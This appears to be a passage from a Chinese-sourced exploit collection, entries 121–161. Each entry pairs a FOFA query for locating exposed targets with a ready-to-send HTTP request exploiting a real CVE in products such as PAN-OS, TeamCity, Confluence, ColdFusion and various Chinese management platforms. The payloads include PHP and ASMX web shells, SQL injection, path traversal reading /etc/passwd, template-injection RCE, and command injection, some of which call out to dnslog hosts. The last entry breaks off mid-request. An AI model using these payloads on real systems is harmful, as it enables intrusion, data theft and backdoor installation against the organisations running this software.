121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The parameter sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command-and-dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file; the <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
